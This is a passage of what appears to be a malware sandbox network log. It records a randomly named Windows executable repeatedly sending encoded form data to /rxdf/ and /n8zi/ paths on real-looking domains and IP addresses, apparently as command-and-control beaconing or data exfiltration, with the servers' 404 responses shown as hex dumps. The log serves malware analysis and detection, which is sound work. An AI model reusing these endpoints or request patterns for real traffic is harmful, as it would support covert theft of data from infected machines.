                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.tedjp-x.com
                                                    Origin: http://www.tedjp-x.com
                                                    Referer: http://www.tedjp-x.com/rxdf/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 71 37 42 38 6e 32 42 55 4a 33 48 50 32 46 42 68 45 62 49 4e 72 36 35 61 72 53 6c 76 35 51 67 68 48 79 68 49 59 68 4a 4e 38 4f 35 74 6d 6b 65 6e 54 39 77 47 4f 30 58 30 33 64 6f 73 64 6f 59 32 5a 73 30 58 78 67 69 72 32 33 67 71 37 48 64 79 53 37 45 72 4d 54 38 54 39 4b 56 53 38 71 6d 56 50 2b 34 7a 6d 31 79 4b 78 2f 65 6c 62 41 34 72 62 32 32 31 4b 36 35 31 49 4b 72 63 57 58 66 33 31 2b 67 59 39 54 72 57 59 38 34 78 4e 33 58 68 38 44 4d 4b 6c 48 72 69 33 69 50 6b 58 68 69 64 37 49 6a 79 76 43 4a 52 71 51 4a 58 44 48 74 63 4b 71 4c 7a 70 77 72 48 46 36 50 48 61 4e 46 65 41 4c 48 4b 69 6e 6e 73 49 39 64 35
                                                    Data Ascii: 7Dihs8p=q7B8n2BUJ3HP2FBhEbINr65arSlv5QghHyhIYhJN8O5tmkenT9wGO0X03dosdoY2Zs0Xxgir23gq7HdyS7ErMT8T9KVS8qmVP+4zm1yKx/elbA4rb221K651IKrcWXf31+gY9TrWY84xN3Xh8DMKlHri3iPkXhid7IjyvCJRqQJXDHtcKqLzpwrHF6PHaNFeALHKinnsI9d5
                                                    Jul 3, 2024 17:53:10.503029108 CEST1236INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 03 Jul 2024 15:54:50 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                    ETag: W/"afe-6098b1f8c138d"
                                                    Content-Encoding: gzip
                                                    Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                                    Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9)
                                                    Jul 3, 2024 17:53:10.503110886 CEST353INData Raw: 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e
                                                    Data Ascii: ,KQ8xa%9s{Qo/|mu1.C-r[,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.649764162.43.101.114805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:53:12.215511084 CEST622OUTPOST /rxdf/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.tedjp-x.com
                                                    Origin: http://www.tedjp-x.com
                                                    Referer: http://www.tedjp-x.com/rxdf/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 71 37 42 38 6e 32 42 55 4a 33 48 50 33 6d 4a 68 47 34 77 4e 74 61 35 56 31 43 6c 76 75 41 67 39 48 79 39 49 59 6c 35 64 38 61 56 74 6e 41 61 6e 53 34 4d 47 43 55 58 30 76 4e 6f 74 51 49 5a 34 5a 73 49 78 78 68 65 72 32 33 30 71 37 44 52 79 52 4a 73 6f 4e 44 38 72 32 71 56 4d 34 71 6d 56 50 2b 34 7a 6d 31 4f 6b 78 2f 47 6c 62 77 49 72 61 55 65 79 48 61 35 32 59 61 72 63 63 33 66 7a 31 2b 67 6d 39 52 66 6f 59 2b 77 78 4e 31 2f 68 38 58 5a 63 76 48 72 67 35 43 4f 55 58 42 2f 55 35 49 65 67 75 53 6c 67 7a 43 39 44 50 52 73 47 57 5a 4c 51 37 67 4c 46 46 34 58 31 61 74 46 30 43 4c 2f 4b 77 77 72 4c 48 4a 34 61 76 72 7a 4e 56 4d 32 69 6e 32 46 35 6a 53 30 39 69 4e 59 6a 70 77 3d 3d
                                                    Data Ascii: 7Dihs8p=q7B8n2BUJ3HP3mJhG4wNta5V1ClvuAg9Hy9IYl5d8aVtnAanS4MGCUX0vNotQIZ4ZsIxxher230q7DRyRJsoND8r2qVM4qmVP+4zm1Okx/GlbwIraUeyHa52Yarcc3fz1+gm9RfoY+wxN1/h8XZcvHrg5COUXB/U5IeguSlgzC9DPRsGWZLQ7gLFF4X1atF0CL/KwwrLHJ4avrzNVM2in2F5jS09iNYjpw==
                                                    Jul 3, 2024 17:53:13.069911003 CEST1236INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 03 Jul 2024 15:54:53 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                    ETag: W/"afe-6098b1f8c138d"
                                                    Content-Encoding: gzip
                                                    Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                                    Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9)
                                                    Jul 3, 2024 17:53:13.069937944 CEST353INData Raw: 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e
                                                    Data Ascii: ,KQ8xa%9s{Qo/|mu1.C-r[,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.649765162.43.101.114805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:53:14.762197971 CEST1635OUTPOST /rxdf/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.tedjp-x.com
                                                    Origin: http://www.tedjp-x.com
                                                    Referer: http://www.tedjp-x.com/rxdf/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 71 37 42 38 6e 32 42 55 4a 33 48 50 33 6d 4a 68 47 34 77 4e 74 61 35 56 31 43 6c 76 75 41 67 39 48 79 39 49 59 6c 35 64 38 62 42 74 6e 7a 53 6e 54 66 59 47 44 55 58 30 78 64 6f 77 51 49 5a 31 5a 73 51 31 78 68 54 51 32 31 4d 71 71 51 5a 79 47 4e 34 6f 45 44 38 72 35 4b 56 4e 38 71 6d 41 50 2b 4a 37 6d 30 79 6b 78 2f 47 6c 62 79 67 72 64 47 32 79 55 4b 35 31 49 4b 72 59 57 58 66 58 31 2b 5a 65 39 53 7a 34 66 4f 51 78 4d 56 50 68 36 68 6c 63 74 6e 72 75 2b 43 4f 4d 58 42 7a 58 35 4c 36 6b 75 53 67 39 7a 43 5a 44 4d 32 56 4f 46 74 36 4c 6b 54 66 46 63 61 7a 73 58 6f 68 74 50 72 72 55 77 69 36 2b 48 49 68 77 6a 72 2f 70 51 2f 32 67 77 58 41 52 38 6e 64 76 30 35 5a 55 70 37 53 75 56 50 45 31 4f 36 76 4d 58 71 34 6b 35 78 74 4c 32 2f 57 6e 73 52 36 30 4e 42 37 33 4d 4e 33 4d 41 31 31 58 67 78 7a 6c 41 71 55 39 68 5a 50 6e 66 4e 75 65 61 58 4e 77 77 38 79 51 66 6c 70 43 42 6c 73 6c 69 48 73 72 74 61 77 51 68 43 71 37 4e 62 44 71 45 72 68 4f 6c 4d 61 57 70 62 31 76 32 59 66 30 63 5a [TRUNCATED]
                                                    Data Ascii: 7Dihs8p=q7B8n2BUJ3HP3mJhG4wNta5V1ClvuAg9Hy9IYl5d8bBtnzSnTfYGDUX0xdowQIZ1ZsQ1xhTQ21MqqQZyGN4oED8r5KVN8qmAP+J7m0ykx/GlbygrdG2yUK51IKrYWXfX1+Ze9Sz4fOQxMVPh6hlctnru+COMXBzX5L6kuSg9zCZDM2VOFt6LkTfFcazsXohtPrrUwi6+HIhwjr/pQ/2gwXAR8ndv05ZUp7SuVPE1O6vMXq4k5xtL2/WnsR60NB73MN3MA11XgxzlAqU9hZPnfNueaXNww8yQflpCBlsliHsrtawQhCq7NbDqErhOlMaWpb1v2Yf0cZQbuwpym4skhR8TdE4dgl6r6kcbdLfhHhTlWBeAfSjjclL2qQELfgIj4RIF898Xkd+Yv3n2+CO8CheLao5+c8TGXoDWE9eNFZD9nkQ/rgAYuFKBVbDiGC3uq5CgtAPu+QNSLPzWy2F6tidGWefP00H1KBrQtqzXqDcTSQYspKdIHL+/yS07eWXBXXY9BISTuKCIEJ5qWu3nDJQv1wPchOul2dgTc08kheMt7RCxjpzQjfgbIINFKpdzpJ4gLHyPthS1O84vxgJ39ienItpHk0Rf/E02T6Wtc4dBPKNDuviuHaHUHGQbe9QGsFfqbkTL+qOCANCLgE0hr/ikUidshK2XSpSdSs8pLldV/xkMZ9wmhyYRnr5oM1UYrWHNESmqMe3Ks4lCBH9eGLyPuDZ1i1/n+OvfjPJ+i3wY4eZBuEiQ9BCXrhj91bjkABbYYZbA6OdBdwBQ70ao3fW+oMNO6l7cLhd+xVSTExjj3wI3v+tpVAGff+EoSBkKG+z5qjLTmxE1rtFteeln5Im57SnNKFNhS8rn8VJs3Zpm21Qqon/8yoNCJ0iLsQ4y+xNf+xWyg2kIqr13aNWvto7HO4/X1Q2YO+HqlTIHMuNQYagViKHTjBwOnjsYX4ABeD+16I0oZZAMGS6Yeb/SWgEUhrH5A9mepyYbgcD2eCpG [TRUNCATED]
                                                    Jul 3, 2024 17:53:15.598923922 CEST1236INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 03 Jul 2024 15:54:55 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                    ETag: W/"afe-6098b1f8c138d"
                                                    Content-Encoding: gzip
                                                    Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                                    Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9)
                                                    Jul 3, 2024 17:53:15.599317074 CEST353INData Raw: 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e
                                                    Data Ascii: ,KQ8xa%9s{Qo/|mu1.C-r[,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    36192.168.2.649766162.43.101.114805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:53:17.331583977 CEST343OUTGET /rxdf/?7Dihs8p=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Bp=2LpD8tLh HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.tedjp-x.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:18.155076981 CEST1236INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 03 Jul 2024 15:54:58 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 2814
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                    ETag: "afe-6098b1f8c138d"
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px;
                                                    Jul 3, 2024 17:53:18.155098915 CEST1236INData Raw: 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 65 78 70 6c 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73
                                                    Data Ascii: margin: 0; padding: 0; color: white;}.explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li {
                                                    Jul 3, 2024 17:53:18.155112982 CEST582INData Raw: 64 69 76 20 69 64 3d 22 62 61 73 65 22 3e 0a 20 20 20 20 3c 68 31 3e 3c 73 70 61 6e 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 68 32 3e
                                                    Data Ascii: div id="base"> <h1><span>404</span><br /> File Not Found</h1> <h2></h2> <p class="explain"></p> <h3>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    37192.168.2.64976745.113.122.18805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:53:23.552231073 CEST616OUTPOST /n8zi/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.3cubesinterior.in
                                                    Origin: http://www.3cubesinterior.in
                                                    Referer: http://www.3cubesinterior.in/n8zi/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 65 42 6c 57 30 4d 67 73 2f 48 31 2b 50 36 44 41 77 59 4e 32 58 64 6c 33 41 5a 58 50 53 35 4a 62 4c 2b 68 41 36 5a 47 75 59 57 58 56 71 4e 58 52 41 59 4b 44 36 42 39 51 70 45 7a 74 42 4e 51 67 47 2f 4e 7a 41 69 51 71 51 78 77 59 4b 77 42 52 70 39 45 33 77 6a 6b 6f 34 42 6e 46 52 57 49 66 6e 54 75 76 44 4f 38 59 38 79 32 5a 55 59 43 37 6e 68 59 46 5a 56 47 77 52 4c 51 71 47 64 37 4a 47 63 47 35 4f 76 49 58 42 7a 56 52 45 6a 49 32 59 71 38 35 63 74 6d 6a 73 77 73 4c 78 39 51 45 73 79 2b 5a 79 68 47 59 39 4f 59 77 4a 62 75 4f 62 72 38 36 48 53 4c 36 37 58 75 6d 31 4b 6f 47 2b 42 32 65 4b 49 73 47 6b 78 6f 34
                                                    Data Ascii: 7Dihs8p=eBlW0Mgs/H1+P6DAwYN2Xdl3AZXPS5JbL+hA6ZGuYWXVqNXRAYKD6B9QpEztBNQgG/NzAiQqQxwYKwBRp9E3wjko4BnFRWIfnTuvDO8Y8y2ZUYC7nhYFZVGwRLQqGd7JGcG5OvIXBzVREjI2Yq85ctmjswsLx9QEsy+ZyhGY9OYwJbuObr86HSL67Xum1KoG+B2eKIsGkxo4


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    38192.168.2.64976845.113.122.18805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:53:26.082559109 CEST640OUTPOST /n8zi/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.3cubesinterior.in
                                                    Origin: http://www.3cubesinterior.in
                                                    Referer: http://www.3cubesinterior.in/n8zi/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 65 42 6c 57 30 4d 67 73 2f 48 31 2b 50 61 54 41 79 37 6c 32 41 74 6c 6f 46 5a 58 50 62 5a 4a 66 4c 2b 74 41 36 59 7a 32 5a 6b 6a 56 71 73 6e 52 42 63 65 44 76 42 39 51 37 6b 7a 6b 50 74 51 2b 47 34 46 37 41 6a 73 71 51 78 4d 59 4b 30 46 52 70 4f 73 32 71 54 6c 4f 6a 52 6e 4c 56 57 49 66 6e 54 75 76 44 4f 6f 79 38 79 2b 5a 55 4c 4b 37 6e 46 45 4b 61 56 47 33 47 37 51 71 43 64 37 4e 47 63 48 57 4f 72 51 39 42 31 4a 52 45 6d 73 32 4a 62 38 36 46 39 6d 6c 6f 77 74 46 38 66 74 32 70 53 7a 38 36 51 75 34 6d 2f 63 32 4d 74 76 55 48 59 38 5a 56 43 72 34 37 56 32 55 31 71 6f 73 38 42 4f 65 59 66 67 68 72 46 4e 62 6c 43 65 5a 35 61 31 6f 32 41 65 77 57 2b 6c 48 4e 6b 46 65 50 41 3d 3d
                                                    Data Ascii: 7Dihs8p=eBlW0Mgs/H1+PaTAy7l2AtloFZXPbZJfL+tA6Yz2ZkjVqsnRBceDvB9Q7kzkPtQ+G4F7AjsqQxMYK0FRpOs2qTlOjRnLVWIfnTuvDOoy8y+ZULK7nFEKaVG3G7QqCd7NGcHWOrQ9B1JREms2Jb86F9mlowtF8ft2pSz86Qu4m/c2MtvUHY8ZVCr47V2U1qos8BOeYfghrFNblCeZ5a1o2AewW+lHNkFePA==
                                                    Jul 3, 2024 17:53:27.542579889 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:53:26 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://3cubesinterior.in/wp-json/>; rel="https://api.w.org/"
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade
